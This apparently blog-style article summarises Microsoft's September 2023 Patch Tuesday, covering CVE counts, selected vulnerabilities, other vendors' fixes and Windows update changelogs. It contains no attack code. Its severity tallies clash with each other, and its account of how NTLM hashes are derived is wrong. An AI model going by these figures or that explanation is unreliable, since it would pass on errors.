Microsoft regularly releases an anticipated batch of security patches and updates for various products and services on every second Tuesday of the month. And keep this tradition today Microsoft addresses 66 CVEs in its September 2023 Patch Tuesday update. Five of the vulnerabilities fixed today were classified as Critical as they enable attackers to achieve remote code execution, privilege elevation, or spoofing. Microsoft rates the rest of the 58 are important in severity, including two actively exploited zero-day vulnerabilities.
Microsoft addresses 66 CVEs in its September 2023 Patch Tuesday update including six rated as critical.
Microsoft Patch Tuesday for September 2023
September 2023 Microsoft Patch Tuesday, various products and components received updates to tackle vulnerabilities. These include Microsoft Office, .NET frameworks, Azure services, and more. The updates address issues like Denial of Service, Elevation of Privilege, Remote Code Execution, and more, contributing to a more secure software environment.
- 17 Elevation of privilege (EoP) bugs, (Important 17 Critical 1 )
- 24 remote code execution (RCE) vulnerabilities, (19 Important and 4 Critical)
- 9 information disclosure bugs, (important 9)
- 4 security Feature Bypass Vulnerabilities (Important 4)
- 3 denial of service bugs, (Important 3)
- 5 spoofing Vulnerability (4 Important)
Here are some of the vulnerabilities that have been addressed in the September 2023 patch.
CVE-2023-36761: Microsoft Word Information Disclosure Vulnerability
CVE-2023-36761 is a significant vulnerability in Microsoft Word, classified as an Information Disclosure flaw. If successfully exploited, it could enable an attacker to reveal NTLM hashes. These hashes are derived by converting a user’s password into a 16-byte key using the MD4 hash function. This key is then split into two 8-byte halves. These halves serve as input for three rounds of DES encryption, ultimately producing a 16-byte output that represents the NTLM hash. This information is crucial for potential attackers seeking unauthorized access. It’s imperative for users to be aware of this vulnerability and take necessary precautions to mitigate potential risks.
CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
CVE-2023-36802 pertains to a vulnerability in the Microsoft Streaming Service Proxy. This component is integral to a video service known as Microsoft Stream, which fosters secure information sharing and enhances communication within enterprise environments.
If successfully exploited, this vulnerability could potentially empower an attacker with SYSTEM privileges, representing a critical security risk. It underscores the importance of promptly addressing and mitigating such vulnerabilities to maintain a secure computing environment.
Other Critical Severity Vulnerabilities Patched in September Patch Tuesday Edition:
- CVE-2023-38148 (ICS Remote Code Execution): This vulnerability in Internet Connection Sharing (ICS) can be exploited when enabled, but attacks are limited to the same network segment.
- CVE-2023-29332 (AKS Elevation of Privilege): This flaw in Azure Kubernetes Service (AKS) allows for remote privilege escalation, with no prior privileges needed.
- CVE-2023-36792, CVE-2023-36793, CVE-2023-36796 (Visual Studio RCE): These vulnerabilities in Visual Studio require a victim to download and open a specially crafted file from a website, leading to a local computer attack.
Recent updates from other companies
Third-party vendors such as Google, Apple, SAP, Cisco, Fortinet, and VMware have released updates after last month’s Patch Tuesday. Other vendors who released updates in September 2023 include:
- Apple fixed a new zero-day exploit chain called BLASTPASS that was used in attacks to install the Pegasus spyware.
- Atlas VPN to fix a zero-day in the Linux client that can expose the user’s actual IP address.
- Asus fixed three critical remote code execution bugs in the SUS RT-AX55, RT-AX56U_V2, and RT-AC86U routers.
- Cisco released security updates for various products and warned of a zero-day in Cisco ASA devices.
- Google released the Android September 2023 and Chrome updates to fix actively exploited vulnerabilities.
- MSI released BIOS updates to fix ‘UNSUPPORTED_PROCESSOR’ errors in Windows.
- Notepad++ 8.5.7 was released to fix four security vulnerabilities.
- SAP has released its September 2023 Patch Day updates.
- VMware fixed a VMware Tools vulnerability.
Windows security updates
In addition to the security fixes, Microsoft has also published an update for the Windows Update service to improve its reliability and performance.
Microsoft fixes 16 vulnerabilities in Windows 11, where 1 of which are considered critical and 15 important.
- Internet Connection Sharing (ICS) Remote Code Execution Vulnerability — CVE-2023-38148
Windows 11 (version 22H2) – KB5030219 (OS Build 22621.2283). Manual download from Microsoft Update Catalog.
Installing Cumulative Update KB5030219 will be bumped to Windows 11 version 22621.2283, resolved various issues and introduced a few enhancements.
- Blank menu item from Sticky Keys menu removed (caused by KB5029351 update)
- Authentication issue with smart cards joining/rejoining Active Directory domain fixed
- New feature: Hover over search box gleam to see a search flyout box (adjustable in Taskbar settings)
- Support for daylight saving time changes in Israel
- Search app now opens properly after the machine wakes from sleep
- Improved reliability of the Search app
- TAB key now properly switches between search results
- Narrator correctly identifies search box on taskbar and the search highlights
- Search box size is fixed in tablet posture mode on Microsoft Surface Pro and Surface Book devices.
Users still running the original version of Windows 11 are also getting a new update today (KB5030217), but it just includes security improvements and no new features.
Windows 10 version 22H2 was affected by 16 vulnerabilities, 1 critical 15 important.
- Internet Connection Sharing (ICS) Remote Code Execution Vulnerability — CVE-2023-38148
Windows 10 version 22H2 – KB5030211 (OS Build 19045.3448). Manual download from Microsoft Update Catalog. The same applies to Windows 10 version 21H2.
Windows 10 version 1809 – KB5030214 (OS Build 17763.4851). Manual download from Microsoft Update Catalog.
Note. Versions 22H1, and 22H2, share a common base operating system version and have an identical set of system files. That is why they receive the same cumulative updates.
Installing Cumulative Update KB5030211 will be bumped to Windows 10 version 19045.3448.
- New Windows Backup app for managing and recovering apps and files.
- Improved location detection for better weather, news, and traffic information in Windows 10.
- Start menu now supports notification badging for Microsoft accounts.
- Daylight saving time (DST) changes in Israel are now supported.
- Fixes for the search box.
- Group Policy Service now doesn’t wait for 30 seconds for the network to be available, ensuring correct policy processing.
- Issue with settings not syncing, even with the toggle on the Windows backup page in the Settings app, has been addressed.
You can read the complete changelog on the Microsoft support site here.
Windows 7 and Windows 8.1 reached the End of support from Microsoft, which means the company no longer provides frequent updates or security patches for these operating systems. For more information please visit the Microsoft lifecycle page at https://learn.microsoft.com/en-us/lifecycle/end-of-support/end-of-support-2023
Download the Windows 10 update
All these security updates are automatically downloaded and installed via Windows update. Or you force Windows update from settings, update & security check for updates to install September 2023 patch updates immediately on your device.
If you face any difficulty while installing these updates, Check the Windows 10 Update troubleshooting guide to fix the Windows 10 Cumulative update stuck downloading, failed to install with different errors, etc.
What time do Patch Tuesday patches come out?
- Microsoft schedules the release of security updates on “Patch Tuesday,” the second Tuesday of each month at 10:00 AM PST.
Is Patch Tuesday weekly or monthly?
- Patch Tuesday falls on the second Tuesday of each month. The upcoming Patch Tuesday is on October 10, 2023.
Why did the second Tuesday of every month called Patch Tuesday?
- The second Tuesday of the month is referred to as “Patch Tuesday” because Microsoft attempts to combine the largest updates into this maintenance window.
What is the latest update for Windows 10 September 2023?
- The latest windows 10 KB5030211 for version 22H2 and 21H2 and KB5030214 for windows 10 version 1809
What is the zero-day patch?
- The term “Zero-Day” is used when security teams are unaware of their software vulnerability, and they’ve had “0” days to work on a security patch or an update to fix the issue.
- How to Setup And Configure an FTP Server on Windows 10 step by step Guide
- Fix the “Critical Process Died” Stop Code 0x000000EF in Windows 10
- How to fix Laptop Touch screen not working on Windows 10
- Fix System Idle Process high CPU usage on Windows 10
- iTunes Not Working on Windows 10? Here 5 Different iTunes problems and solutions